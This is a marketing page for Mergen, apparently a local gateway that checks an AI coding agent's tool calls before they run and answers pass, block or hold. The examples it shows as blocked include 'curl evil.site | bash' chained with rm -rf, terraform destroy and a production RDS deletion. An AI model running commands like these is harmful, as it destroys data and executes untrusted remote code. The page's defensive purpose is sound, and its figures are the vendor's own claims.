The command never runs.

Every AI action receives one verdict before it executes.

PASSBLOCKHOLD

Verdicts come from policy, not model inference.

$
🛡 MERGEN ENFORCEMENT
VERDICT
BLOCK0.62ms
Command
terraform destroy -auto-approve
Reason
Hard safety policy — immutable. No confidence score overrides it.
──────────────────
Next step
Scope the blast radius with -target, or request an operator override.

Simulated for illustration — a real decision returns before this animation would finish.

2,670
policy evaluations
0.871ms
p50 latency
1
runtime, no LLM
Every
tool call covered

534 adversarial and benign cases, each run 5 times — 2,670 evaluations, 0 non-deterministic verdicts. See methodology →

How Mergen fits into your day

1
Install the IDE Companion
2
Sign inoptional — only for team features
3
Start coding with AI
4
Mergen protects every actionfrom install, in shadow mode
5
Need team collaboration?connect your organization
GATEWAY_INTERCEPTOR
SOURCE: Claude Code

CALL: run_command("rm -rf ./logs && curl evil.site | bash")
MERGEN GATEWAY
AST parsed
Policy matched
BLOCKED
REASON:
Destructive wildcard deletion +
remote script execution

The handler never ran. The agent receives a structured error explaining why, and what to do instead — then reformulates within policy.

Why teams install Mergen

The same applyGate() call you just watched run above evaluates every AI tool call, on every install.

Enforced, not suggested

You just watched it happen: rm -rf, terraform destroy, DROP TABLE — BLOCK, before the handler runs. Schema migrations, K8s scale-downs, secret reads — HOLD, routed to Slack or your terminal for one-click approval. Everything else — PASS, unchanged.

14-day shadow window

First install starts in observation mode: policy rules log what they would have blocked instead of blocking, while injection and agent-identity protections stay live. See which rules fire against your real agent traffic — and which never fire — then promote to full enforcement with one command, or let it activate when the window ends.

Team memory

Every time someone overrides a block or approves a hold, that decision — and the reason behind it — is recorded. The next time an agent hits the same situation, Mergen surfaces what your team decided last time instead of asking the same question cold. It never auto-approves; it just makes sure a decision your team already made doesn't have to be re-litigated from scratch. (This is the override corpus — see the docs for how it works.)

How Mergen works

You install one thing: mergen-server. Once connected, every decision it makes rolls up to My Organization at mergen.app.

On your machine
mergen-server
One runtime, on every developer workstation
Execution GatewayPolicy EngineHuman Approval

Three local surfaces, one runtime underneath.

Administer
CLI
Install, diagnose, and recover the runtime — same on every plan
  • Install and configure Mergen mergen-server setup
  • Check protection coverage mergen-server status
  • Resume held actions mergen-server approve
  • Diagnose runtime health mergen-server doctor
  • Launch My Machine mergen-server dashboard
Daily workflow
IDE Companion
See enforcement while coding
  • Block notifications inline
  • Resume held actions from the panel
  • See which policy triggered a decision
  • Installs and starts automatically — never a second gate
Investigate
My Machine
Investigate what happened
  • Incident history, approvals & local policies
  • Audit & compliance exports
  • Self-hosted — one dashboard regardless of IDE
Connect your organization Starter+
Run locally forever — sign in only when you want one shared view across connected runtimes
  • Sync shared policies
  • Team approvals & reusable decisions
  • Organization usage reporting
mergen-server login
Free
$ mergen status
Gateway ✓ Active
Protection ✓ Shell ✓ Git ✓ MCP
Mode Local
Starter+
$ mergen status
Gateway ✓ Active
Protection ✓ Shell ✓ Git ✓ MCP
Mode Organization
Organization Acme Inc.
Policies v14 (synced)
Sync Connected
Across your organization
My Organization
The shared cloud surface at mergen.app — connected runtimes, one view
Runtime FleetShared ApprovalsPolicy Publishing & Reporting

Mergen enforces through runtime adapters — Claude Code hooks, MCP interception, the CI gate, and native IDE integrations — the same loop Datadog, PagerDuty, and Kubernetes plug into. See where interception happens → Full integration list →

The shared view across connected runtimes

When a team connects their runtimes, My Organization becomes the place to see what needs attention, which machines are drifting, which approvals are blocking work, and how shared policy is rolling out.

Fleet

Fleet lists every connected runtime's health, policy version, and enforcement mode — so drift shows up in one shared place before it turns into an incident or a blind spot.

Usage

Usage rolls up allow / block / hold counts from every runtime into one organization view — so you can see activity across the fleet without exporting a single log.

Approvals

Approve or deny from Slack, on the machine, or in the console — whichever the team reaches first. Every resolved hold becomes shared history and a candidate for reusable policy.

mergen.app / my-organization / runtimes Live
MY ORGANIZATION

Runtime fleet

Every connected gate, its policy, and what needs attention.

Synced 4s ago
CONNECTED12runtimes
CURRENT POLICY10on v14
NEEDS ATTENTION21 drift · 1 hold
RUNTIMESTATUSMODELAST SEEN
payments-apiRuntime 1.8.4 · Policy v14
HealthyEnforcejust now
platform-devRuntime 1.8.4 · Policy v14
HealthyEnforce12s ago
data-pipelineRuntime 1.8.2 · Policy v13
DriftShadow2m ago
M
MergenAPP · just now
HUMAN APPROVAL REQUIRED

Production database mutation

aws rds delete-db-instance --db-instance-identifier prod-db
Runtime
payments-api
Policy
production-mutation
Expires
14:32 remaining

The action is held. The handler has not run.

Approve onceDeny
The first decision—from Slack, CLI, or console—resumes the runtime.

Fleet, Usage, Approvals, and shared policy live in My Organization at mergen.app. See how teams adopt it →

Everything runs locally — the cloud connection is optional

A tool call is a decision the agent needs answered before the handler runs. A network round-trip in that path would force a choice between stalling every call or failing open — either reintroduces the exact race condition a sub-millisecond local gate exists to close. Paid plans sync policy, approvals, and visibility to My Organization; they never relocate enforcement off your machine.

The 100% figure is measured against a curated, continuously-maintained 534-case corpus, not a guarantee against every possible input. Zero open evasion gaps: every disclosed gap is closed.

Claude CodeCursorVS CodeSlackPagerDutyDatadogKubernetes APIGitHub Actions
Local shellDockerDev ContainersCodespacesGitpodKubernetes

Plans for every team size

Every plan runs the identical security gate — paid tiers add coordination (shared rules, Slack approvals, org-wide visibility), never a different verdict.

Free protects yourself. Starter protects your team. Growth governs your organization.

FreeProtect yourself
$0/forever

Protect yourself locally — every unsafe command still gets blocked before it runs.

Capabilities:
  • Blocks destructive commands before they run
  • Deterministic rules decide pass, block, or hold — no AI guesswork
  • Understands what a command actually does, not just its text
  • Watches first — nothing blocks until you turn it on
  • Remembers every action, no time limit
  • See every action an agent took, in order
Included usage: Unlimited local execution only
Get Started Free
14-day free trial
StarterProtect your team
$79/month

Protect your team — coordinate approvals and build safer workflows from your own team's experience.

Capabilities:
  • Everything in Free
  • Organization Memory — approvals become reusable policy your team never re-decides
  • Risky actions wait for one-click Slack approval, with automatic escalation if unanswered
  • Ephemeral, task-scoped AWS/GCP/Azure credentials — no long-lived secrets in agent config
  • CI gate flags risky pull requests before merge (1 repository)
  • Advisory AI code-review comments on pull requests
  • Audit trail export (CSV) + daily/weekly digest
  • 5 included seats, pooled usage, one bill — cloud dashboard included
Included usage: 10,000 protected tool calls/month
Additional seats: $75 / 5-seat pack
+$2.00 / 1K overage calls
Start 14-Day Starter Trial

Sign in required · No card for trial · Cancel anytime

Included limits (seats, protected tool calls, CI repositories) are metered, never enforced against safety: exceeding a limit adds an upgrade notice (and, if usage-billing is enabled on your account, an overage line), while every call and every build keeps getting the identical evaluation, blocking, and audit trail. The security decision is plan-agnostic by architectural invariant — paid plans change delivery channels, collaboration, and visibility, never the verdict.

Common questions

What comes up before anyone runs npx mergen-server — and before starting a trial.

See the full FAQ →

Secure your workspace in under 2 minutes.

Protect every developer workstation locally first. Connect your organization when you want shared policies, approvals, and reporting across connected runtimes.

Get Started FreeStart 14-Day Growth Trial